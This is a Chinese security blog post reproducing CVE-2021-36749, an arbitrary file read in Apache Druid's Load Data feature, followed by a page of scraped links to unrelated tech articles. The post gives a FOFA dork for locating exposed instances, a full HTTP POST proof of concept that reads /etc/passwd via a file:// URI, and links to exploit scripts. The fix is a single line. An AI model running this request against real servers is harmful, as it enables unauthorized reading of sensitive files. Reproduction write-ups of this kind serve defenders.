Adminxe
Adminxe

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞_第1张图片

0x00 漏洞详情

由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP
InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。

0x01 fofa语法

title="Apache Druid"

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞_第2张图片

0x02 漏洞复现

主界面–>Load data –>HTTP(s)–>Connect Data–>URIs(使用file://协议进行读取)

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞_第3张图片

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞_第4张图片

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞_第5张图片

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞_第6张图片

file:///etc/passwd

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞_第7张图片

POC:

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 127.0.0.1:8888
Content-Length: 413
Accept: application/json, text/plain, */*
Origin: http://127.0.0.1:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json;charset=UTF-8
Referer: http://127.0.0.1:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞_第8张图片

0x03 利用脚本

  • https://github.com/BrucessKING/CVE-2021-36749/blob/main/CVE-2021-36749.py
  • https://github.com/dorkerdevil/CVE-2021-36749/blob/main/CVE-2021-36749.py

0x04 修复方法

升级版本,设置访问权限

转载请注明:Adminxe's Blog » 【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞

你可能感兴趣的:(漏洞复现,CVE-2021-36749,Apache,Druid,任意文件读取漏洞)

  • Doris、ClickHouse 和 Flink 这三个技术典型的应用场景 每天瞎忙的农民工 大数据clickhouseflink大数据doris
    Doris、ClickHouse和Flink这三个技术在不同业务场景下有各自的成功落地方案,主要用于数据分析、实时计算和高性能查询。以下是一些典型的应用场景:1.ApacheDoris落地方案应用场景Doris适用于海量数据的实时查询和分析,尤其适用于报表查询、OLAP分析和BI工具对接。案例某互联网广告公司业务背景:广告业务需要分析用户点击行为,监测广告投放效果,并进行精准推荐。技术方案:数据来
  • 聪明办法学python第4次笔记 weixin_44811994 笔记
    目录变量Variables新值的数据类型不必与旧值相同变量是一个标签变量命名规则:元组的解包函数Functions`header`用于定义函数的**名称**和**参数**`body`包含函数执行的语句(`statement`)我们使用**函数名**来调用函数函数可以有任意多个参数,也可以一个都没有参数的数量要匹配语句与表达式StatementsandExpressions表达式定义:Anexpre
  • 每日十个计算机专有名词 (7) 太炀 每日十个计算机专有名词杂项
    Metasploit词源:Meta(超越,超出)+exploit(漏洞利用)Metasploit是一个安全测试框架,用来帮助安全专家(也叫渗透测试人员)发现和利用计算机系统中的漏洞。你可以把它想象成一个工具箱,里面装满了各种可以测试网络和应用程序安全的工具。它有很多预设的“攻击模块”,这些模块可以模拟黑客的攻击方式,帮助你检查自己的系统是否容易受到攻击。通过这些攻击模拟,你可以发现安全漏洞,并及时
  • 有向图的拓扑排序-BFS求解 自律的kkk 宽度优先算法
    有向图的拓扑排序-BFS求解题目描述给定一个n个点m条边的有向图,图中可能存在重边和自环。请输出任意一个该有向图的拓扑序列,如果拓扑序列不存在,则输出-1。若一个由图中所有点构成的序列A满足:对于图中的每条边(x,y),x在A中都出现在y之前,则称A是该图的一个拓扑序列。输入格式第一行包含两个整数n和m。接下来m行,每行包含两个整数x和y,表示点x和点y之间存在一条有向边(x,y)。输出格式共一行
  • java.lang.NoSuchMethodError: org.elasticsearch.client.RestClient.performRequest(Ljava/lang/String;Lj 频繁输入,积极输出 eses
    es创建索引时,报:java.lang.NoSuchMethodError:org.elasticsearch.client.RestClient.performRequest(Ljava/lang/String;Ljava/lang/String;Ljava/util/Map;Lorg/apache/http/HttpEntity;[Lorg/apache/http/Header;)Lorg/e
  • 在Python中高效操作三维和四维数组相乘:人工智能基础 NumPy部分 秋‍. pythonnumpy开发语言人工智能
    一、前言在深度学习、科学计算和数据分析领域,处理高维数组是家常便饭。本文将深入探讨三维和四维数组的相乘操作,通过NumPy库演示各种实用技巧。二、核心概念梳理1.数组维度理解三维数组:(层,行,列)可理解为多个二维矩阵的堆叠四维数组:(批次大小,通道数,高度,宽度)常见于图像处理2.关键函数对比函数特性说明支持维度np.multiply元素级相乘任意np.dot标准矩阵点积≤2np.matmul广
  • 目录遍历文件包含测试 蚂蚁质量 安全测试安全web安全网络
    众多Web应用程序在日常运作中,都离不开对文件的使用与管理。然而,一旦应用程序所采用的输入验证方法设计欠佳或部署不当,攻击者便有机可乘,利用这类漏洞对系统发起攻击,进而读取或写入那些本不应被随意访问的文件。在某些极端情形下,攻击者甚至能够借助此漏洞执行任意代码或系统命令。传统意义上,Web服务器与Web应用程序通常会部署身份验证机制,以此来管控对文件及资源的访问权限。Web服务器会尽力将用户可访问
  • org.apache.commons.jar包官方免费版(附下载地址) 王的博客 开发
    官方免费下载链接:http://commons.apache.org/proper/commons-io/download_io.cgi亲测可用,如上所示。
  • 使用Idea创建springboot项目 奔跑吧邓邓子 SpringBoot深入浅出常见问题解答(FAQ)高效运维javaidea
    提示:“奔跑吧邓邓子”的高效运维专栏聚焦于各类运维场景中的实际操作与问题解决。内容涵盖服务器硬件(如IBMSystem3650M5)、云服务平台(如腾讯云、华为云)、服务器软件(如Nginx、Apache、GitLab、Redis、Elasticsearch、Kubernetes、Docker等)、开发工具(如Git、HBuilder)以及网络安全(如挖矿病毒排查、SSL证书配置)等多个方面。无论
  • Mean Shift聚类算法深度解析与实战指南 万事可爱^ 机器学习修仙之旅#无监督学习算法聚类数据挖掘MeanShift均值漂移聚类均值算法
    一、算法全景视角MeanShift(均值漂移)是一种基于密度梯度上升的非参数聚类算法,无需预设聚类数量,通过迭代寻找概率密度函数的局部最大值完成聚类。该算法在图像分割、目标跟踪等领域有广泛应用,尤其擅长处理任意形状的密度分布。二、核心原理剖析2.1核密度估计使用核函数对数据分布进行平滑估计,高斯核函数为:K(x)=12πhe−x22h2K(x)=\frac{1}{\sqrt{2\pi}h}e^{-
  • 使用 Flink CDC 实现 MySQL 数据,表结构实时入 Apache Doris 一天两晒网 dorismysqlflinkdorisflinkcdc
    背景现有数据库:mysql数据:库表较多,每个企业用户一个分库,每个企业下的表均不同,无法做到聚合,且表可以被用户随意改动,增删改列等,增加表分析:用户自定义分析,通过拖拽定义图卡,要求实时,点击确认即出现相应结果,其中有无法预判的过滤问题:随业务增长,企业用户越来越多,mysql压力越来越大,已经出现一些图卡加载过慢[mysqlsql]同步流程脚本读取mysql中需要同步的企业,在获取需要同步的
  • Spring Boot整合FTP实现文件的上传和下载 anhao78 ftp实现文件的上传和下载
    第一步:pom.xml文件中引入依赖包   commons-net   commons-net   3.3第二步:编写ftp上传文件工具类packagecom.split.ftp;importlombok.Data;importlombok.extern.slf4j.Slf4j;importorg.apache.commons.net.ftp.*;importorg.springframework
  • 建筑兔零基础人工智能自学记录34|深度学习与神经网络2 阿克兔 人工智能toto学习人工智能深度学习神经网络
    1、人工神经网络ANN从生物课上学到的有关神经元、突触的生物神经网络,被模仿出了简化的人工神经网络(ANN,artificialneuralnetwork)。ANN结构为:输入层、隐藏层、输出层人工神经元:基于生物神经元的数学模型ANN过程:输入---加权求和---激活函数激活函数:类似生物神经元的阈值,达到阈值输出信号(‘神经网络的万能逼近定理’---两层以上神经网络可以逼近任意函数)2、深度学
  • CTF-web: Rust 的过程宏 A5rZ rust网络安全
    Rust的过程宏(ProceduralMacros)是一种强大的元编程工具,允许你在编译时对代码进行操作和生成。与属性宏和派生宏不同,过程宏可以接收并处理任意Rust代码,生成新的代码片段。这里有一个简单的例子来说明Rust的过程宏。假设你想创建一个过程宏来生成一个函数,该函数返回一个固定的字符串。我们可以按如下步骤进行:创建一个新的Rust库项目:cargonewmy_proc_macro--l
  • 【python】pathlib库的使用,详细 资源存储库 笔记算法python开发语言
    目录1.基本使用:创建Path对象2.路径的各种操作获取当前工作目录获取当前脚本所在的路径3.路径的属性4.路径的拼接5.遍历目录筛选特定类型的文件递归遍历目录6.文件操作检查文件是否存在删除文件读取文件内容写入文件7.高级操作检查路径是否是符号链接获取文件的绝对路径8.文件和目录的比较9.文件系统的其他操作总结:pathlib是Python3.4及以后版本引入的一个现代化的文件路径操作库,旨在提
  • 【排序算法】——交换排序 code monkey. 排序算法算法排序算法c++
    前言排序(Sorting)是计算机程序设计中的一种重要操作,它的功能是将一个数据元素(或记录)的任意序列,重新排列成一个关键字有序的序列。所谓排序,就是使一串记录,按照其中的某个或某些关键字的大小,递增或递减的排列起来的操作。排序算法,就是如何使得记录按照要求排列的方法。排序算法在很多领域得到相当地重视,尤其是在大量数据的处理方面。一个优秀的算法可以节省大量的资源。简介所谓排序算法,即通过特定的算
  • Windows和AD域提权枚举脚本及工具介绍 vortex5 网络安全安全windows
    在Windows和ActiveDirectory(AD)域环境中,权限提升和枚举是渗透测试的关键部分。为了有效进行这些操作,使用特定的工具和脚本可以帮助你识别和利用系统中的漏洞。以下是一些常用于Windows和AD域环境中的权限提升和枚举脚本工具:Windows环境中的提权枚举脚本PowerUp描述:PowerUp是一个PowerShell脚本,专注于在Windows系统中查找权限提升漏洞。它能够
  • Spark 运行问题 java.lang.NoSuchMethodError 解决方案 @飞往你的山 sparkscala
    一般情况,出现这种问题是因为scala和spark的版本不匹配,需要重新下载两者相匹配的版本。File-ProjectStructure-Libraies-“+”-java选择spark目录下jars文件夹Maven项目,pom.xml文件中添加Spark依赖,需要联网下载,或者本地库中已经下载好依赖包2.3.3org.apache.sparkspark-core_2.11${spark.vers
  • php序列化与反序列化 lally. phpandroid开发语言
    文章目录基础知识魔术方法:在序列化和反序列化过程中自动调用的方法什么是`__destruct()`方法?何时触发`__destruct()`方法?用途:语法示例:反序列化漏洞利用前提条件一些绕过策略绕过__wakeup函数绕过正则匹配绕过相等逻辑判断利用大S的ascll码绕过反序列化字符逃逸高级反序列化phar反序列化什么是PHAR文件?特点session反序列化基础知识序列化:将对象转化为一个可
  • STL容器 -- map/multimap 柚子树cc C/C++STLmapmultimap
    1、map/multimap容器基本概念map的特性是,所有元素都会根据元素的键值自动排序。map所有的元素都是pair,同时拥有实值和键值,pair的第一元素被视为键值,第二元素被视为实值,map不允许两个元素有相同的键值。我们可以通过map的迭代器改变map的键值吗?答案是不行,因为map的键值关系到map元素的排列规则,任意改变map键值将会严重破坏map组织。如果想要修改元素的实值,那么是
  • 消息队列之 RabbitMQ基本流程 搬砖养女人 数据库架构javaspringtomcatsql
    介绍关于消息队列,从前年开始断断续续看了些资料,想写很久了,但一直没腾出空,近来分别碰到几个朋友聊这块的技术选型,是时候把这块的知识整理记录一下了。市面上的消息队列产品有很多,比如老牌的ActiveMQ、RabbitMQ,目前我看最火的Kafka,还有ZeroMQ,去年底阿里巴巴捐赠给Apache的RocketMQ,连redis这样的NoSQL数据库也支持MQ功能。总之这块知名的产品就有十几种,就
  • STL之map/multimap 内核之道 C/C++开发
    1.map的特性是,所有元素都会根据元素的键值自动排序。map所有的元素都是pair,同时拥有实值和键值,pair的第一元素被视为键值,第二元素被视为实值,map不允许两个元素有相同的键值。我们不可以通过map的迭代器来改变map的键值,因为map的键值关系到map元素的排列规则,任意改变map键值将会严重破坏map组织。如果想要修改元素的实值,那么是可以的。Map和list拥有相同的某些性质,当
  • yolov5-训练好的模型部署的几种方式-ONNX 黄晓魚 halcon3dPCL点云处理深度神经网络YOLOC#python
    ONNX,即OpenNeuralNetworkExchange,是微软和Facebook发布的一个深度学习开发工具生态系统,旨在让AI开发人员能够随着项目发展而选择正确的工具。ONNX所针对的是深度学习开发生态中最关键的问题之一,在任意一个框架上训练的神经网络模型,无法直接在另一个框架上用。开发者需要耗费大量时间精力把模型从一个开发平台移植到另一个。因此,如何实现不同框架之间的互操作性,简化从研究
  • golang下载安装图文教程(Linux环境) 吸嘎嘎能手 golang开发语言后端io多路复用socketlinux
    Go官网下载地址:Allreleases-TheGoProgrammingLanguageGo官方镜像站(推荐):Allreleases-TheGoProgrammingLanguage1.下载源码包点击链接进入官网,选择Linux的安装包下载2.上传Linux解压将下载好的源码包上传到Linux服务器,上传到任意路径,接着将其解压到/usr/local目录目录下,指令如下:sudotar-zxv
  • Golang:Go 1.23 版本新特性介绍 梦想画家 #Golanggolang
    流行的编程语言Go已经发布了1.23版本,带来了许多改进、优化和新特性。在Go1.22发布六个月后,这次更新增强了工具链、运行时和库,同时保持了向后兼容性。Go1.23的新增特性主要包括语言特性、工具链改进、标准库更新等方面,以下是具体介绍1:语言特性新的迭代器语法:for-range循环中现在可以使用迭代器函数作为range表达式,如func(func(K)bool)。开发者能够为任意序列创建自
  • CSRF 跨站请求伪造漏洞 看繁星aa csrfhttp网络安全web安全
    原理当一个网站A使用Cookie,存储Session或Token来用于单点登录和权限操作时。浏览器将Cookie存储到浏览器中。当用户在访问另一个网站V时,黑客可以通过伪造表单,向网站A发送修改重要信息(如密码)、支付等操作,浏览器会自动携带Cookie。在服务端看来这就是一个正常的请求,于是在用户不知情的情况下,做出响应。两个条件用户访问站点A并产生了Cookie用户没有退出站点A(清除Cook
  • 基于web漏洞扫描及分析系统设计 毕设工作室_wlzytw python论文项目前端pythondjangoflasktornadopyqtplotly
    基于web漏洞扫描及分析系统设计摘要随着信息技术的发展和网络应用在我国的普及,针对我国境内信息系统的恶意网络攻击也越来越多,并且随着黑客攻击技术的不断地更新,网络犯罪行为变得越来越难以应对,用户日常访问的网站是否安全对于普通网民而言难以辨别,保护人民不受不法侵害也是难上加难。如何识别网站的潜在危险性,以及网站出现安全性问题该如何防御,尽可能减少网站被攻击后造成的实际损失,是目前迫切需要解决的难题。
  • Apache APISIX Dashboard 安装与配置完全指南 娄凌斌
    ApacheAPISIXDashboard安装与配置完全指南apisix-dashboard-built项目地址:https://gitcode.com/gh_mirrors/ap/apisix-dashboard-built一、项目基础介绍及编程语言ApacheAPISIXDashboard是一个用于管理ApacheAPISIX的图形界面工具,它简化了API网关的配置流程,使得开发者和运维人员能
  • Apache APISIX Dashboard 使用教程 陆璞朝Jocelyn
    ApacheAPISIXDashboard使用教程项目地址:https://gitcode.com/gh_mirrors/ap/apisix-dashboard1.项目的目录结构及介绍ApacheAPISIXDashboard的目录结构如下:apisix-dashboard/├──api│├──Dockerfile│├──Makefile│├──cmd│├──conf│├──internal│└─
  • Apache APISIX Dashboard 操作指南 咎丹娜
    ApacheAPISIXDashboard操作指南项目地址:https://gitcode.com/gh_mirrors/ap/apisix-dashboard-built本文将引导您了解ApacheAPISIXDashboard,如何快速启动它,以及在实际场景中的应用案例和最佳实践。此外,我们还将探讨其典型生态项目。1.项目介绍ApacheAPISIXDashboard是一个图形化界面工具,专为
  • Spring4.1新特性——Spring MVC增强 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • mysql 性能查询优化 annan211 javasql优化mysql应用服务器
    1 时间到底花在哪了? mysql在执行查询的时候需要执行一系列的子任务,这些子任务包含了整个查询周期最重要的阶段,这其中包含了大量为了 检索数据列到存储引擎的调用以及调用后的数据处理,包括排序、分组等。在完成这些任务的时候,查询需要在不同的地方 花费时间,包括网络、cpu计算、生成统计信息和执行计划、锁等待等。尤其是向底层存储引擎检索数据的调用操作。这些调用需要在内存操
  • windows系统配置 cherishLC windows
    删除Hiberfil.sys :使用命令powercfg -h off 关闭休眠功能即可: http://jingyan.baidu.com/article/f3ad7d0fc0992e09c2345b51.html 类似的还有pagefile.sys msconfig 配置启动项 shutdown 定时关机 ipconfig 查看网络配置 ipconfig /flushdns
  • 人体的排毒时间 Array_06 工作
    ======================== ||  人体的排毒时间是什么时候?|| ======================== 转载于: http://zhidao.baidu.com/link?url=ibaGlicVslAQhVdWWVevU4TMjhiKaNBWCpZ1NS6igCQ78EkNJZFsEjCjl3T5EdXU9SaPg04bh8MbY1bR
  • ZooKeeper cugfy zookeeper
    Zookeeper是一个高性能,分布式的,开源分布式应用协调服务。它提供了简单原始的功能,分布式应用可以基于它实现更高级的服务,比如同步, 配置管理,集群管理,名空间。它被设计为易于编程,使用文件系统目录树作为数据模型。服务端跑在java上,提供java和C的客户端API。 Zookeeper是Google的Chubby一个开源的实现,是高有效和可靠的协同工作系统,Zookeeper能够用来lea
  • 网络爬虫的乱码处理 随意而生 爬虫网络
    下边简单总结下关于网络爬虫的乱码处理。注意,这里不仅是中文乱码,还包括一些如日文、韩文 、俄文、藏文之类的乱码处理,因为他们的解决方式 是一致的,故在此统一说明。     网络爬虫,有两种选择,一是选择nutch、hetriex,二是自写爬虫,两者在处理乱码时,原理是一致的,但前者处理乱码时,要看懂源码后进行修改才可以,所以要废劲一些;而后者更自由方便,可以在编码处理
  • Xcode常用快捷键 张亚雄 xcode
    一、总结的常用命令:     隐藏xcode command+h     退出xcode command+q     关闭窗口 command+w     关闭所有窗口 command+option+w     关闭当前
  • mongoDB索引操作 adminjun mongodb索引
    一、索引基础:    MongoDB的索引几乎与传统的关系型数据库一模一样,这其中也包括一些基本的优化技巧。下面是创建索引的命令:    > db.test.ensureIndex({"username":1})    可以通过下面的名称查看索引是否已经成功建立: &nbs
  • 成都软件园实习那些话 aijuans 成都 软件园 实习
    无聊之中,翻了一下日志,发现上一篇经历是很久以前的事了,悔过~~   断断续续离开了学校快一年了,习惯了那里一天天的幼稚、成长的环境,到这里有点与世隔绝的感觉。不过还好,那是刚到这里时的想法,现在感觉在这挺好,不管怎么样,最要感谢的还是老师能给这么好的一次催化成长的机会,在这里确实看到了好多好多能想到或想不到的东西。   都说在外面和学校相比最明显的差距就是与人相处比较困难,因为在外面每个人都
  • Linux下FTP服务器安装及配置 ayaoxinchao linuxFTP服务器vsftp
    检测是否安装了FTP [root@localhost ~]# rpm -q vsftpd 如果未安装:package vsftpd is not installed  安装了则显示:vsftpd-2.0.5-28.el5累死的版本信息   安装FTP 运行yum install vsftpd命令,如[root@localhost ~]# yum install vsf
  • 使用mongo-java-driver获取文档id和查找文档 BigBird2012 driver
    注:本文所有代码都使用的mongo-java-driver实现。   在MongoDB中,一个集合(collection)在概念上就类似我们SQL数据库中的表(Table),这个集合包含了一系列文档(document)。一个DBObject对象表示我们想添加到集合(collection)中的一个文档(document),MongoDB会自动为我们创建的每个文档添加一个id,这个id在
  • JSONObject以及json串 bijian1013 jsonJSONObject
    一.JAR包简介     要使程序可以运行必须引入JSON-lib包,JSON-lib包同时依赖于以下的JAR包:     1.commons-lang-2.0.jar     2.commons-beanutils-1.7.0.jar     3.commons-collections-3.1.jar &n
  • [Zookeeper学习笔记之三]Zookeeper实例创建和会话建立的异步特性 bit1129 zookeeper
    为了说明问题,看个简单的代码,   import org.apache.zookeeper.*; import java.io.IOException; import java.util.concurrent.CountDownLatch; import java.util.concurrent.ThreadLocal
  • 【Scala十二】Scala核心六:Trait bit1129 scala
    Traits are a fundamental unit of code reuse in Scala. A trait encapsulates method and field definitions, which can then be reused by mixing them into classes. Unlike class inheritance, in which each c
  • weblogic version 10.3破解 ronin47 weblogic
    版本:WebLogic Server 10.3 说明:%DOMAIN_HOME%:指WebLogic Server 域(Domain)目录 例如我的做测试的域的根目录 DOMAIN_HOME=D:/Weblogic/Middleware/user_projects/domains/base_domain 1.为了保证操作安全,备份%DOMAIN_HOME%/security/Defa
  • 求第n个斐波那契数 BrokenDreams
            今天看到群友发的一个问题:写一个小程序打印第n个斐波那契数。         自己试了下,搞了好久。。。基础要加强了。           &nbs
  • 读《研磨设计模式》-代码笔记-访问者模式-Visitor bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; interface IVisitor { //第二次分派,Visitor调用Element void visitConcret
  • MatConvNet的excise 3改为网络配置文件形式 cherishLC matlab
    MatConvNet为vlFeat作者写的matlab下的卷积神经网络工具包,可以使用GPU。 主页: http://www.vlfeat.org/matconvnet/ 教程: http://www.robots.ox.ac.uk/~vgg/practicals/cnn/index.html 注意:需要下载新版的MatConvNet替换掉教程中工具包中的matconvnet: http
  • ZK Timeout再讨论 chenchao051 zookeepertimeouthbase
    http://crazyjvm.iteye.com/blog/1693757 文中提到相关超时问题,但是又出现了一个问题,我把min和max都设置成了180000,但是仍然出现了以下的异常信息: Client session timed out, have not heard from server in 154339ms for sessionid 0x13a3f7732340003
  • CASE WHEN 用法介绍 daizj sqlgroup bycase when
    CASE WHEN 用法介绍 1. CASE WHEN 表达式有两种形式 --简单Case函数  CASE sex  WHEN '1' THEN '男'  WHEN '2' THEN '女'  ELSE '其他' END  --Case搜索函数  CASE WHEN sex = '1' THEN
  • PHP技巧汇总:提高PHP性能的53个技巧 dcj3sjt126com PHP
    PHP技巧汇总:提高PHP性能的53个技巧  用单引号代替双引号来包含字符串,这样做会更快一些。因为PHP会在双引号包围的字符串中搜寻变量,  单引号则不会,注意:只有echo能这么做,它是一种可以把多个字符串当作参数的函数译注:  PHP手册中说echo是语言结构,不是真正的函数,故把函数加上了双引号)。  1、如果能将类的方法定义成static,就尽量定义成static,它的速度会提升将近4倍
  • Yii框架中CGridView的使用方法以及详细示例 dcj3sjt126com yii
    CGridView显示一个数据项的列表中的一个表。 表中的每一行代表一个数据项的数据,和一个列通常代表一个属性的物品(一些列可能对应于复杂的表达式的属性或静态文本)。  CGridView既支持排序和分页的数据项。排序和分页可以在AJAX模式或正常的页面请求。使用CGridView的一个好处是,当用户浏览器禁用JavaScript,排序和分页自动退化普通页面请求和仍然正常运行。 实例代码如下:
  • Maven项目打包成可执行Jar文件 dyy_gusi assembly
    Maven项目打包成可执行Jar文件 在使用Maven完成项目以后,如果是需要打包成可执行的Jar文件,我们通过eclipse的导出很麻烦,还得指定入口文件的位置,还得说明依赖的jar包,既然都使用Maven了,很重要的一个目的就是让这些繁琐的操作简单。我们可以通过插件完成这项工作,使用assembly插件。具体使用方式如下: 1、在项目中加入插件的依赖: <plugin>
  • php常见错误 geeksun PHP
    1.  kevent() reported that connect() failed (61: Connection refused) while connecting to upstream, client: 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", upstream: "fastc
  • 修改linux的用户名 hongtoushizi linuxchange password
    Change Linux Username 更改Linux用户名,需要修改4个系统的文件: /etc/passwd /etc/shadow /etc/group /etc/gshadow 古老/传统的方法是使用vi去直接修改,但是这有安全隐患(具体可自己搜一下),所以后来改成使用这些命令去代替: vipw vipw -s vigr vigr -s   具体的操作顺
  • 第五章 常用Lua开发库1-redis、mysql、http客户端 jinnianshilongnian nginxlua
    对于开发来说需要有好的生态开发库来辅助我们快速开发,而Lua中也有大多数我们需要的第三方开发库如Redis、Memcached、Mysql、Http客户端、JSON、模板引擎等。 一些常见的Lua库可以在github上搜索,https://github.com/search?utf8=%E2%9C%93&q=lua+resty。   Redis客户端 lua-resty-r
  • zkClient 监控机制实现 liyonghui160com zkClient 监控机制实现
             直接使用zk的api实现业务功能比较繁琐。因为要处理session loss,session expire等异常,在发生这些异常后进行重连。又因为ZK的watcher是一次性的,如果要基于wather实现发布/订阅模式,还要自己包装一下,将一次性订阅包装成持久订阅。另外如果要使用抽象级别更高的功能,比如分布式锁,leader选举
  • 在Mysql 众多表中查找一个表名或者字段名的 SQL 语句 pda158 mysql
    在Mysql 众多表中查找一个表名或者字段名的 SQL 语句:   方法一:SELECT table_name, column_name from information_schema.columns WHERE column_name LIKE 'Name';   方法二:SELECT column_name from information_schema.colum
  • 程序员对英语的依赖 Smile.zeng 英语程序猿
    1、程序员最基本的技能,至少要能写得出代码,当我们还在为建立类的时候思考用什么单词发牢骚的时候,英语与别人的差距就直接表现出来咯。 2、程序员最起码能认识开发工具里的英语单词,不然怎么知道使用这些开发工具。 3、进阶一点,就是能读懂别人的代码,有利于我们学习人家的思路和技术。 4、写的程序至少能有一定的可读性,至少要人别人能懂吧... 以上一些问题,充分说明了英语对程序猿的重要性。骚年
  • Oracle学习笔记(8) 使用PLSQL编写触发器 vipbooks oraclesql编程活动Access
        时间过得真快啊,转眼就到了Oracle学习笔记的最后个章节了,通过前面七章的学习大家应该对Oracle编程有了一定了了解了吧,这东东如果一段时间不用很快就会忘记了,所以我会把自己学习过的东西做好详细的笔记,用到的时候可以随时查找,马上上手!希望这些笔记能对大家有些帮助!     这是第八章的学习笔记,学习完第七章的子程序和包之后
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他